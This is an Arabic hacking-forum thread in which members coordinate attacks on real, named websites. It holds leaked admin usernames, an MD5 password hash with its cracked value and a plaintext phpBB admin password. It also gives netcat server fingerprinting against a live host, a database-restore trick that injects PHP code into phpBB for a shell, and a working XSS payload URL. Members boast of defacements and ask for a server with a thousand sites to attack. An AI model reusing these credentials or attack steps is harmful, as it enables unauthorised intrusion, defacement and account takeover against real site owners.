[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)

[tenshu2011]

أكيي أعني بها أرفع الشال

 

[bleu moon]

أكييييييييييي
لم أفهم كيفية رفع الشال
اذا كنت تعرف أبعتلي كيف

عندي مواقع أخرى :angel:

اووك لو رفع معي بعمل لك شرح بالصوت :mdr:

 

[tenshu2011]

أكي في الانتظار

 

[tenshu2011]

هل عملت بنظام اللينوكس ؟

أفضل الأدوات لحقن قاعدة البيانات هي sqlninja

لكن تأخذ وقت طويل حسب سرعة النات

 

[bleu moon]

هل عملت بنظام اللينوكس ؟

أفضل الأدوات لحقن قاعدة البيانات هي sqlninja

لكن تأخذ وقت طويل حسب سرعة النات

لا uch:

 

[bleu moon]

الباس غلط
http://rhythmsystem.2pointproject.com/admin/

 

[tenshu2011]

للأسف

أنا أستعمل اللينوكس باك تراك 5

كل أدوات الهاكر موجودة ^^

أنصحك به ..........

رأيت تعليقك حول معرفة السرفر في أحد المواضيع

سهلة جدا باستعمال netcat

netcat -v rhythmsystem.2pointproject.com 80

ثم

HEAD / HTTP/1.0

ثم ENTER مرتين


المثال



root@bt:~# netcat -v rhythmsystem.2pointproject.com 80
DNS fwd/rev mismatch: rhythmsystem.2pointproject.com != 2pointsource.com
rhythmsystem.2pointproject.com [216.227.208.44] 80 (www) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 5558
Content-Type: text/html
Content-Location: http://216.227.208.44/Index.html
Last-Modified: Thu, 29 Apr 2010 18:35:38 GMT
Accept-Ranges: bytes
ETag: "a88daac3cae7ca1:14855"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 03 Jul 2011 23:21:31 GMT
Connection: close

 

[bleu moon]

pass : 57ff5847af65e833fb68e1cd05f063c9
user : admin

http://rhythmsystem.2pointproject.com/admin

 

[bleu moon]

للأسف

أنا أستعمل اللينوكس باك تراك 5

كل أدوات الهاكر موجودة ^^

أنصحك به ..........

رأيت تعليقك حول معرفة السرفر في أحد المواضيع

سهلة جدا باستعمال netcat

netcat -v rhythmsystem.2pointproject.com 80

ثم

HEAD / HTTP/1.0

ثم ENTER مرتين


المثال



root@bt:~# netcat -v rhythmsystem.2pointproject.com 80
DNS fwd/rev mismatch: rhythmsystem.2pointproject.com != 2pointsource.com
rhythmsystem.2pointproject.com [216.227.208.44] 80 (www) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 5558
Content-Type: text/html
Content-Location: http://216.227.208.44/Index.html
Last-Modified: Thu, 29 Apr 2010 18:35:38 GMT
Accept-Ranges: bytes
ETag: "a88daac3cae7ca1:14855"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 03 Jul 2011 23:21:31 GMT
Connection: close

مافهمت ولا حاجه هههههههه :grrrrrr:
ذي معلومات للسيرفر فقط ؟

 

[tenshu2011]

نعم للسرفر
من أين حصلت على الباس المشفرة ؟
هل فكيت التشفير

 

[tenshu2011]

الباس المشفة ليست صالحة

هذا الفك
c3d3rrun

 

[tenshu2011]

اعادة تشفيرها

http://schwett.com/md5/index.php?md5value=c3d3rrun&md5c=MD5+Krypt

نفس النتيجة

 

[SpookWeb]

السيرفر راح يسببلي الجنوووووون

وسيلة لحد هنا:

http://www.cheela.org/cheelfor
http://www.cheela.org/cheelfor/admin
phpBB forum
username: vbondoux
he's admin...
pass: sZCnYyk8

جربت كتير, ماقدرت الاقي وسيلة لرفع الشيل. بس في طريقة غير...

تخلق فيل تسميه "Shell.sql" أو آية شي تاني... بس يكون sql.وتحت داخيلو

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbbhpinfo());' WHERE user_id=2;​

وبعدها تعمل restore database من لوحة التحكم الادمن.

وفي تعديل ال profile نرى أن معلومات ال php ظهرت. يعني بالكود نبدل phpinfo() بـأي كود php تاني ويمشي. بس أنا مااعرف اش......... وللصراحة يئست منيل phpBB ورايح الدور على ثغرة تانية بـنفس الموقع.

 

[tenshu2011]

الحمد لله أنك استفدت من فك التشفير

مشكلتي أني لا أعرف رفع الشال اذا لم أجد الأبلود
أو تحديد مكانه في url

 

[bleu moon]

نعم للسرفر
من أين حصلت على الباس المشفرة ؟
هل فكيت التشفير

لا
كنت بصمم آندكس هه

 

[bleu moon]

مين رفع شل ؟

 

[bleu moon]

تم أكتشاف ثغرة XSS ههه

والأحلى علا موقع إسرائيلي

http://www.spalter-mikvehs.com/contact.php?cntr= >"><ScRiPt >alert(408014427112);</ScRiPt>

http://www.spalter-mikvehs.com/contact.php
تم الاسقاط

 

[bleu moon]

http://www.spalter-mikvehs.com/cont...ntyten/code.css type=text/css rel=stylesheet>

 

[abdellatef]

الله عليك يا غالي م في سرفر اخر هدف ندعس ابوه
ولكن يكون مملوء مواقع 1000 او اكتر لكي يتوفر المجال لكل الهاكرز مبتدئ متوسط ..

 

[bleu moon]

اعطونا السيرفر يلي بدكم